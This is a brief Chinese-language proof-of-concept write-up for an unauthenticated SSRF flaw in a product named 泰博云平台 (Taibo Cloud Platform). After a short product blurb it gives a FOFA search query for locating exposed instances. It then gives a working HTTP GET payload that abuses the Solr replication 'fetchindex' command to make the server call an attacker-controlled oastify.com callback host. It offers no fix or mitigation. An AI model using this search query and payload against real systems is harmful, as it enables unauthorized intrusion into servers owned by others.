0x01 产品简介

泰博云平台，就是指以电商集群的方式，通过供应链有效连接组成“商务云”生态系统，在产品、服务、营销推广等方面实现资源共享，“物”就是线下实体店网络，以众包模式，将行业制造商、分销商、零售商，和提供本土化设计、物流、安装的优质服务商，纳入统一的云制造服务体系。

0x02 漏洞概述

泰博云平台存在SSRF漏洞，未授权的攻击者可以通过该漏洞诱使服务器端应用程序向攻击者选择的任意域发出HTTP请求。

0x03 测绘语句

fofa：title="泰博云平台"

0x04 漏洞复现

​
使用burp自带的dnslog

payload：GET /solr/collection1/replication/?command=fetchindex&masterUrl=http://0cdc9itn8qlwksoruooyf4fquh09ozco.oastify.com HTTP/1.1

​